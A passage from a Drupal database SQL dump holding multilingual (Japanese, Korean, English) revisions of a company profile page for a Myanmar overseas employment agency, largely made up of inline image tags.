data-align=\"center\" data-entity-uuid=\"63ac130c-f5fd-4391-982d-9cbf22c9c88b\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-2.jpg\" data-align=\"center\" data-entity-uuid=\"80e04f60-8b31-432d-8034-205f1107df2f\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-3.jpg\" data-align=\"center\" data-entity-uuid=\"e0e57835-6cc3-483a-895d-4d5108e80c57\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-4.jpg\" data-entity-uuid=\"9b3a507c-edd4-4ce3-b1a2-4936996fbe84\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-5.jpg\" data-align=\"center\" data-entity-uuid=\"9eac5e99-94a6-4dab-a71a-c4c7a78b8a7b\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-6.jpg\" data-align=\"center\" data-entity-uuid=\"99025867-1165-45b9-987a-162bd77afc85\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-7.jpg\" data-align=\"center\" data-entity-uuid=\"ab865942-61f8-4761-ac2c-b83b675886cf\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-8.jpg\" data-align=\"center\" data-entity-uuid=\"6eb2dc0f-9c32-4d4f-bb0a-7648ab39ab11\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-9.jpg\" data-align=\"center\" data-entity-uuid=\"810afaf6-ff82-44e0-b231-927e848a41cc\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-10.jpg\" data-align=\"center\" data-entity-uuid=\"3258c9ec-64da-4a37-9e22-cff0a7b23efc\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-11.jpg\" data-align=\"center\" data-entity-uuid=\"0f435fe2-d603-4e29-b1d6-f0cc0a29d626\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-12.jpg\" data-align=\"center\" data-entity-uuid=\"a095c373-2df3-4bba-be96-e259086824d6\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-13.jpg\" data-align=\"center\" data-entity-uuid=\"aeca03e1-f9a3-4e0e-b7b6-1660dbd60c8a\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-14.jpg\" data-align=\"center\" data-entity-uuid=\"99606141-7880-4242-9f8a-39d779b7c3f4\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-15.jpg\" data-entity-uuid=\"ebdb65e0-ba0b-4289-b787-403a08a7137c\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-16.jpg\" data-entity-uuid=\"89d8fc77-4e52-42ff-81bd-8cbddd3dfa5f\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-17.jpg\" data-align=\"center\" data-entity-uuid=\"9f81c640-bf3c-45f2-85d1-72c351c50da7\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-18.jpg\" data-align=\"center\" data-entity-uuid=\"eaba01fe-9f4f-4c78-b4f7-f966c16106b2\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-19.jpg\" data-align=\"center\" data-entity-uuid=\"28845640-721c-4663-99e4-3fe89a3fc124\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-20.jpg\" data-align=\"center\" data-entity-uuid=\"310286d4-6f8d-425b-b758-ba0c7a46a78c\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-21.jpg\" data-align=\"center\" data-entity-uuid=\"2a48e008-54b7-4ada-9bec-ec877fb83f54\" data-entity-type=\"file\"><img data-entity-uuid=\"010a0743-1136-4045-92de-ffa7bb03b84f\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-22.jpg\" data-align=\"center\"><img src=\"/sites/default/files/inline-images/NC-23.jpg\" data-align=\"center\" data-entity-uuid=\"61230765-b357-46fe-a38d-1699896c48d6\" data-entity-type=\"file\"><img data-entity-uuid=\"f940eee5-3ae3-4b94-9585-f317c7d9bcb8\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-24.jpg\" data-align=\"center\"><img src=\"/sites/default/files/inline-images/NC-25.jpg\" data-entity-uuid=\"e21d162f-6f5a-4935-bbcb-5001a8cba017\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-26.jpg\" data-align=\"center\" data-entity-uuid=\"00ae4e32-0e8a-4187-9efe-abfe0a26501b\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-27.jpg\" data-align=\"center\" data-entity-uuid=\"2989d3e0-2393-49ad-a73e-684f01edf0fa\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-28.jpg\" data-align=\"center\" data-entity-uuid=\"56339d67-286d-4418-9789-87b2f0456386\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-29.jpg\" data-align=\"center\" data-entity-uuid=\"b26a003e-c37f-4b76-bb1a-3b646ab2f771\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-30.jpg\" data-align=\"center\" data-entity-uuid=\"891213d9-115b-4b86-8d26-3ebbbbeb98a8\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-31.jpg\" data-align=\"center\" data-entity-uuid=\"95019304-f6cb-4eaa-90da-ef0d7f51ee47\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-32.jpg\" data-align=\"center\" data-entity-uuid=\"361d538d-8be6-49d8-ae4e-5ac9247fd5b9\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-33.jpg\" data-align=\"center\" data-entity-uuid=\"e46b1924-0cc4-41fc-baa4-df9dd73fbec8\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-34.jpg\" data-align=\"center\" data-entity-uuid=\"809ca92e-91d6-401f-b00b-567cc35ce1c5\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-35.jpg\" data-align=\"center\" data-entity-uuid=\"667d5781-8402-43e6-853f-ec90e796e6c7\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-36.jpg\" data-align=\"center\" data-entity-uuid=\"58b87ffa-6876-47b0-9e6e-d43d2c7aff38\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-37.jpg\" data-align=\"center\" data-entity-uuid=\"7b3b8c38-5bbf-4e74-85eb-618ca90b2db6\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-38.jpg\" data-align=\"center\" data-entity-uuid=\"d0e647b4-4413-4a58-b4cb-91c95524d97f\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-39.jpg\" data-align=\"center\" data-entity-uuid=\"ad197c72-ff23-4b15-b4ad-d15c791e6a77\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-40.jpg\" data-align=\"center\" data-entity-uuid=\"894ca453-d21f-4356-ad3e-bdb7c3e12408\" data-entity-type=\"file\" alt=\"\"><img data-align=\"center\" data-entity-uuid=\"d65558d3-211e-4a10-8124-f4f01a42f4b5\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-41.jpg\">', '', 'full_html'),
('page', 0, 23, 271, 'ja', 0, '<p>当社は2004年に設立され、登録ID(295/2004-2005)を取得し、以来サービスの提供を行ってきました。そして、2023年に当社ニューコメットトレンディング海外エージェンシーを設立し、運営を開始しました。<br>当社はニュー コメット トレーディング グループの一部である。その中で最大規模のゼーヤーニューコメット自動車売買&amp;サービス株式会社は自動車の輸入許可を得て、建設現場用のトラックや、交通機関として使われるバスや様々な機械を日本から直接輸入し、販売する事業を25年間続けてきました。納税もきちんと行い、100人の従業員を雇用するまでになりました。<br>また、グループの一部であるニューコメット建築株式会社、ゼッヤシェピーティー建築株式会社、アウンネーウィン建築株式会社も政府から許可を多く受け取り、合わせて200人以上の人材紹介に成功しております。<br>現在、ニューコメットトレンディング海外エージェンシーでは、ミャンマー全国から来た民族を問わずに韓国の造船所で働きたい人たちに対して、シンマライ湾岸で経験豊富な指導者たちの下で訓練を受ける機会を提供し、仕事の紹介を行っています。<br>さらに、ドバイ、マレーシア、シンガポール、タイ、日本への就職もサポートしています。<br>ミャンマーの若者たちが自分らしさを保ちながら、自分に合った仕事を見つけ、日本の技術を学ぶことができるように支援を続けています。日本語能力試験(JLPT, JFT, NAT-TEST, TOP-J)に合格した学生に対しては、ワークビザや研修ビザを取得するための支援を提供しています。<br>我々ニューコメットトレーディング海外エージェンシーは、経験豊富で能力の高い研修生を育成し、海外の仕事チャンスを提供することに尽力して参ります。</p><img src=\"/sites/default/files/inline-images/1-NC_0.jpg\" data-align=\"center\" data-entity-uuid=\"7147154e-6c57-4d0c-99dc-5e6a1ad56cc8\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-1_1.jpg\" data-align=\"center\" data-entity-uuid=\"0a8cade2-9871-451c-a978-1d09fd84f0de\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-2_0.jpg\" data-align=\"center\" data-entity-uuid=\"1c875d61-a0c2-42a5-b28e-ff5255dd8ad3\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-3_0.jpg\" data-align=\"center\" data-entity-uuid=\"80dbdd8c-e8cd-465b-b26c-e04b67966c31\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-4_0.jpg\" data-align=\"center\" data-entity-uuid=\"d71b12e7-3d70-4a59-9715-2de3919ebc7d\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-5_0.jpg\" data-align=\"center\" data-entity-uuid=\"8a845720-846c-47c3-b9e9-e1f3098f65fc\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-6_0.jpg\" data-align=\"center\" data-entity-uuid=\"b24eb73f-1d94-4450-81a5-afb6790a13f7\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-7_0.jpg\" data-align=\"center\" data-entity-uuid=\"51eb9cfb-ea78-4874-a2fb-af8d0ff97c38\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-8_0.jpg\" data-align=\"center\" data-entity-uuid=\"873929b2-4641-4686-834e-aa5ef5948b3a\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-9_0.jpg\" data-align=\"center\" data-entity-uuid=\"aa07abd4-d198-4e2c-af81-6f1eae19da17\" data-entity-type=\"file\" alt=\"\"><p>&nbsp;</p><img src=\"/sites/default/files/inline-images/NC-10_0.jpg\" data-entity-uuid=\"41991b55-c606-4270-9a2f-eb3871ba0f31\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-11_0.jpg\" data-align=\"center\" data-entity-uuid=\"7f57bb37-0f0d-4aea-be9b-4a52fc0adf6f\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-12_0.jpg\" data-align=\"center\" data-entity-uuid=\"88251347-e029-437d-9ff8-51f406d4402c\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-13_0.jpg\" data-align=\"center\" data-entity-uuid=\"b1eadb3f-c0b7-445e-aee6-f7523ba1158d\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-14_0.jpg\" data-align=\"center\" data-entity-uuid=\"676ffad7-c9a6-4d2a-9969-98e69477570c\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-15_0.jpg\" data-align=\"center\" data-entity-uuid=\"1131bddf-f0bb-4121-8c20-574a69c2e43d\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-16_0.jpg\" data-align=\"center\" data-entity-uuid=\"b0805653-8b57-493a-b7da-98b99b135795\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-17_0.jpg\" data-align=\"center\" data-entity-uuid=\"6e057327-e93f-41cc-a966-3bbfdb7046b0\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-18_0.jpg\" data-align=\"center\" data-entity-uuid=\"e2e7295f-d240-4c94-90f6-b52bc0c587bc\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-19_0.jpg\" data-align=\"center\" data-entity-uuid=\"1a08f51b-fce7-42d3-ae81-1ad523dfd3e1\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-20_0.jpg\" data-align=\"center\" data-entity-uuid=\"df97660b-54a9-403b-9796-90dcfbb580bd\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-21_0.jpg\" data-align=\"center\" data-entity-uuid=\"456bf806-4df8-483a-9bb9-78b3e285cd70\" data-entity-type=\"file\"><img data-entity-uuid=\"81098b50-a382-45b2-b96a-44bb91384739\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-22_0.jpg\" data-align=\"center\"><img src=\"/sites/default/files/inline-images/NC-23_0.jpg\" data-align=\"center\" data-entity-uuid=\"6c66b62a-1389-4f5c-b496-bd6f105c4259\" data-entity-type=\"file\"><img data-entity-uuid=\"f8bf2dde-b25f-46bb-bc27-d95b894955e3\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-24_0.jpg\" data-align=\"center\"><img src=\"/sites/default/files/inline-images/NC-25_0.jpg\" data-align=\"center\" data-entity-uuid=\"547038de-6845-4549-9311-0f02a922f630\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-26_0.jpg\" data-align=\"center\" data-entity-uuid=\"9c4a4a7d-81b0-4e33-b434-9e141438631c\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-27_0.jpg\" data-align=\"center\" data-entity-uuid=\"ab06b9a1-42d7-4f07-9be5-8a825c7fca60\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-28_0.jpg\" data-align=\"center\" data-entity-uuid=\"6e769851-41be-4e61-8110-5290daf2cda3\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-29_0.jpg\" data-align=\"center\" data-entity-uuid=\"ca9cad00-b0a2-4251-9585-5c48526f9748\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-30_0.jpg\" data-align=\"center\" data-entity-uuid=\"3aae8220-86a7-4232-91d1-58e14468ec77\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-31_0.jpg\" data-align=\"center\" data-entity-uuid=\"031623ed-3c0b-4a1b-acd5-2d701d16ebac\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-32_0.jpg\" data-align=\"center\" data-entity-uuid=\"ef87488d-b6fc-43b9-a474-536a45ca31b3\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-33_0.jpg\" data-align=\"center\" data-entity-uuid=\"b6b3f255-33bb-4aa9-bf27-91cff7be1296\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-34_0.jpg\" data-align=\"center\" data-entity-uuid=\"19536b68-3af1-4ad0-9b3f-6a52f8d321d4\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-35_0.jpg\" data-align=\"center\" data-entity-uuid=\"99f5c203-f9a2-461a-8abc-2c8ba6a07f85\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-36_0.jpg\" data-align=\"center\" data-entity-uuid=\"a6cddcbb-87bf-46e9-b5f0-6eb2c81ee34a\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-37_0.jpg\" data-align=\"center\" data-entity-uuid=\"6e3b7635-3292-469e-a404-d217c165d0c8\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-38_0.jpg\" data-align=\"center\" data-entity-uuid=\"96bb0f24-5735-4d44-9780-209fc82eba38\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-39_0.jpg\" data-align=\"center\" data-entity-uuid=\"b0020490-36a6-4ed1-bde8-eecc0d0e0bc0\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-40_0.jpg\" data-align=\"center\" data-entity-uuid=\"7d4ada41-9768-43b4-83b9-469cc689b193\" data-entity-type=\"file\"><img data-align=\"center\" data-entity-uuid=\"5f5513ae-611d-4f95-aaba-1227dc176b2c\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-41_0.jpg\">', '', 'full_html');
INSERT INTO `node_revision__body` (`bundle`, `deleted`, `entity_id`, `revision_id`, `langcode`, `delta`, `body_value`, `body_summary`, `body_format`) VALUES
('page', 0, 23, 271, 'ko', 0, '<p>저희 ``New Comet Trading\'\' 회사는 2004년에 설립되어 사업자등록번호(295/2004-2005)로 영업을 시작하였습니다.<br>뉴코멧 해외직업소개회사는 2023년 외국인고용업 면허를 취득하여 서비스 활동을 시작하였습니다.</p><p><br>저희 뉴코멧 해외직업소개회사 \"New Comet Overseas Employment Agency\"는자매 회사인 &nbsp;제야뉴코멧 자동차 판매 및 서비스 회사, 뉴코멧회사등 기업들과 협력하여 경제통상자원부에서 &nbsp;차량 수입허가를 신청했고 각종 상용트럭, 관광 산업 및 운송에 사용되는 다양한 유형의 버스 및 기계를 일본에서 직접 구매 판매하는 사업을 25년 이상 &nbsp;종사해 왔고 나라를 위한 정한 세금들을 냈습니다. 게다가100 명 이상의 직원에게 고용 기회를 제공했습니다.</p><p><br>또한 쌍둥이 회사인 뉴코멧건설 회사, 제야슈웨삐띡 건설 회사, 아웅네원 회사들은 정부 부처로부터 입찰 (tender)을 받고 건설 작업을 하는 동안 200명 이상의 직원에게 고용 기회를 제공했습니다.</p><p><br>저희 \"뉴코멧 해외 직업 소개회사\"는 한국 조선소로 취업을 희망하는 미얀마 각지에서 온 소수민족 형제들을 교통통신부 산하의 씬마락 (Sinmalike) 조선소에서 유능한 트레이너들와 함께 실력있는 용접공이 되도록 수업을 제공하고 있으며 관련 기업체로 취업할 수 있게 도와주고 있습니다.또한, 두바이, 말레이시아, 싱가포르, 태국, 일본 같은 국가에서 일하기를 원하는 청년들에게 취업 기회를 받알 수 있도록 &nbsp;서비스들을 제공하고 있습니다.</p><p><br>New Comet Trading Agency Co., Ltd.는 미얀마의 젊은 치누들이 일본의 개발한 첨단 기술을 배우고 꿈을 실현할 수 있도록 필요한 교육을 제공하고 돕고 있습니다.</p><p><br>일본으로 취업비자, 연수비자로 가기 위해 필요한 자격시험(JLPT, JFT, NAT-TEST, TOP-J)에 합격할 수 있도록 어학당도 개설 및 교육을 지원하고 있습니다.</p><p><br>저희는”뉴코멧 해외직업소개회사” 는 미얀마에서 우수한 기능인력을 배출하여 해외로 파견하는 서비스를 제공하기 위해 끊임없이 노력하고 있습니다.</p><img src=\"/sites/default/files/inline-images/1-NC_1.jpg\" data-align=\"center\" data-entity-uuid=\"7375e186-cf58-4d75-b92f-9eab22b78118\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-1_2.jpg\" data-align=\"center\" data-entity-uuid=\"d19e5ddf-b119-4ed3-ac45-b0803d864c96\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-2_1.jpg\" data-align=\"center\" data-entity-uuid=\"4dc4f426-e69c-44ec-8caf-4b1931fdf8b8\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-3_1.jpg\" data-align=\"center\" data-entity-uuid=\"f854e47f-d973-4dd9-8219-826768f1adc8\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-4_1.jpg\" data-align=\"center\" data-entity-uuid=\"13857fa4-2c7a-4d5b-990d-45454d4ce664\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-5_1.jpg\" data-align=\"center\" data-entity-uuid=\"c4d3c7e6-c2a6-47c1-a423-afbb8fed637d\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-6_1.jpg\" data-align=\"center\" data-entity-uuid=\"55284a88-e85b-4812-9ae7-807f898d55f7\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-7_1.jpg\" data-align=\"center\" data-entity-uuid=\"c2b2e5f4-fb99-4766-b2fd-9b2d6e680823\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-8_1.jpg\" data-align=\"center\" data-entity-uuid=\"0dfa63f3-2933-4e8b-842c-fb4562d7176d\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-9_1.jpg\" data-align=\"center\" data-entity-uuid=\"16e03ce5-055f-4f8f-8be5-1f11619e8445\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-10_1.jpg\" data-align=\"center\" data-entity-uuid=\"2a148620-3a3b-4fb9-8117-f6376f457d08\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-11_1.jpg\" data-align=\"center\" data-entity-uuid=\"87fee7fa-f754-4ed1-8b4c-e407735f3467\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-12_1.jpg\" data-align=\"center\" data-entity-uuid=\"9a88bbba-3b28-41fd-a8a8-84cca1770e30\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-13_1.jpg\" data-align=\"center\" data-entity-uuid=\"cbc0b282-1b93-4f31-a52e-e00ed85f6499\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-14_1.jpg\" data-align=\"center\" data-entity-uuid=\"8bba0525-3d17-4730-ac6a-43174e89662b\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-15_1.jpg\" data-align=\"center\" data-entity-uuid=\"5f6a15dd-8d0a-4102-b60c-36467fd6e2a0\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-16_1.jpg\" data-align=\"center\" data-entity-uuid=\"91065924-7e1b-40a5-a985-ab3a738841c7\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-17_1.jpg\" data-align=\"center\" data-entity-uuid=\"cd43fa36-c108-48c2-b25d-dc1862c70dea\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-18_1.jpg\" data-align=\"center\" data-entity-uuid=\"525a5838-a4d8-457f-97be-230841a5f654\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-19_1.jpg\" data-align=\"center\" data-entity-uuid=\"4b653764-4d92-4445-8e27-7614f6ef64a5\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-20_1.jpg\" data-align=\"center\" data-entity-uuid=\"e3ff3d3c-7c9e-462a-91f1-6c6a9aa06067\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-21_1.jpg\" data-align=\"center\" data-entity-uuid=\"d8dbbc11-8a02-4d92-beee-82d3aba0c040\" data-entity-type=\"file\"><img data-entity-uuid=\"48756932-2a18-4eed-9166-8ae3d494765e\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-22_1.jpg\" data-align=\"center\"><img src=\"/sites/default/files/inline-images/NC-23_1.jpg\" data-align=\"center\" data-entity-uuid=\"f184253a-5469-4443-ad8a-350db9f4c92d\" data-entity-type=\"file\"><img data-entity-uuid=\"a06d2513-b3b1-4975-8202-104c9b9ddf54\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-24_1.jpg\" alt=\"\" data-align=\"center\"><img src=\"/sites/default/files/inline-images/NC-25_1.jpg\" data-align=\"center\" data-entity-uuid=\"3b495714-4bd4-411e-ae46-cc161a43ecd1\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-26_1.jpg\" data-align=\"center\" data-entity-uuid=\"d495b5fa-e307-41df-b301-614c7b02a674\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-27_1.jpg\" data-align=\"center\" data-entity-uuid=\"ad5dc94c-17ae-411f-99e9-6d1b74a22e99\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-28_1.jpg\" data-align=\"center\" data-entity-uuid=\"c3de86e8-0aee-413b-b2d5-5ba6506e8954\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-29_1.jpg\" data-align=\"center\" data-entity-uuid=\"7535e5c5-67cc-42fe-a4b1-8360b4e324d5\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-30_1.jpg\" data-align=\"center\" data-entity-uuid=\"f42194d2-173d-4d4b-ac0c-284914e1cb87\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-31_1.jpg\" data-align=\"center\" data-entity-uuid=\"f127d213-3626-4b42-bc37-8092a71b102e\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-32_1.jpg\" data-align=\"center\" data-entity-uuid=\"71bc98fd-06ba-41c0-bcf6-b00ac31d60c2\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-33_1.jpg\" data-align=\"center\" data-entity-uuid=\"e2aa83c9-dcae-4217-b822-f3873b24be0e\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-34_1.jpg\" data-align=\"center\" data-entity-uuid=\"97341ea9-c3d9-4a97-b53e-fcd700908167\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-35_1.jpg\" data-align=\"center\" data-entity-uuid=\"3d0fcd94-7f1e-4ab3-b585-7de2b6abb4a2\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-36_1.jpg\" data-align=\"center\" data-entity-uuid=\"0fcd4e94-95d7-4068-bb81-324b11b42f0b\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-37_1.jpg\" data-align=\"center\" data-entity-uuid=\"0619bbdf-c510-43bc-9e9b-533659637d64\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-38_1.jpg\" data-align=\"center\" data-entity-uuid=\"ff1153a3-aa9c-4673-bf92-21b3b0b9331d\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-39_2.jpg\" data-align=\"center\" data-entity-uuid=\"0170f578-5243-4700-a630-995e3e009f65\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-40_1.jpg\" data-align=\"center\" data-entity-uuid=\"1d69982c-23e7-4c63-b748-667e38a06b7f\" data-entity-type=\"file\"><img data-align=\"center\" data-entity-uuid=\"f37e9936-ed46-428b-abbb-f585384d411f\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-41_1.jpg\">', '', 'full_html'),
('page', 0, 23, 274, 'en', 0, '<p>We, ``NEW COMET TRADING\'\' company, was established in 2004 and started operating with company registration number (295/2004-2005).</p><p>NEW COMET TRADING AGENCY Co.,Ltd (New Comet Overseas Employment Agency) licence was obtained in 2023 and since then, the company has started to carry out service activities.</p><p>We, ``NEW COMET TRADING AGENCY\'\' company, which is a brother company, such as, ZEYA NEW COMET Auto Sale &amp; Services Co.,Ltd, NEW COMET Co.,Ltd, have applied for vehicle import permits from the Ministry of Economy and Commerce, and have been working for more than 25 years in the business of buying, importing and selling various types of business trucks, tourism and transportation buses and machinery directly from Japan, and have paid the taxes set for the state. More than 100 employees were given employment opportunities.</p><p>In addition, brother companies such as NEW COMET Construction Co.,Ltd, NEW ZAYYA SHWE PYI Construction Co.,Ltd, AUNG NAY WUN Construction Co.,Ltd and other companies have also successfully won tenders from government ministries and have provided employment opportunities to more than 200 employees.</p><p>Our company \"NEW COMET TRADING AGENCY “company is currently providing welding training courses to become qualified skilled workers at the Sinmalike Shipyard for ethnic brothers from all over Myanmar who want to work in Korea\'s shipyards and connect them with job opportunities.</p><p>In addition, we are connecting job opportunities for young people who want to work in countries such as Dubai, Malaysia, Singapore, Thailand, and Japan.</p><p>We at NEW COMET TRADING AGENCY Co.Ltd, are assisting on responsible for learning about Japan\'s developed advanced technologies, cultures and expressing their personal abilities and goals for the young generation in Myanmar.</p><p>In order to successfully pass the qualification tests (JLPT, JFT, NAT-TEST, TOP-J) required to go to Japan with a Work Visa and Training Visa, we are opening language training schools and providing teaching support.</p><p>We, \"NEW COMET TRADING AGENCY\" company, is constantly striving to provide services that produce talented skilled workers from Myanmar and send them to foreign countries.</p><img src=\"/sites/default/files/inline-images/1-NC.jpg\" data-align=\"center\" data-entity-uuid=\"1427dc29-05a8-43fe-8ca3-965d16ed0865\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-1_0.jpg\" data-align=\"center\" data-entity-uuid=\"63ac130c-f5fd-4391-982d-9cbf22c9c88b\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-2.jpg\" data-align=\"center\" data-entity-uuid=\"80e04f60-8b31-432d-8034-205f1107df2f\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-3.jpg\" data-align=\"center\" data-entity-uuid=\"e0e57835-6cc3-483a-895d-4d5108e80c57\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-4.jpg\" data-entity-uuid=\"9b3a507c-edd4-4ce3-b1a2-4936996fbe84\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-5.jpg\" data-align=\"center\" data-entity-uuid=\"9eac5e99-94a6-4dab-a71a-c4c7a78b8a7b\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-6.jpg\" data-align=\"center\" data-entity-uuid=\"99025867-1165-45b9-987a-162bd77afc85\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-7.jpg\" data-align=\"center\" data-entity-uuid=\"ab865942-61f8-4761-ac2c-b83b675886cf\" data-entity-type=\"file\" alt=\"\"><img 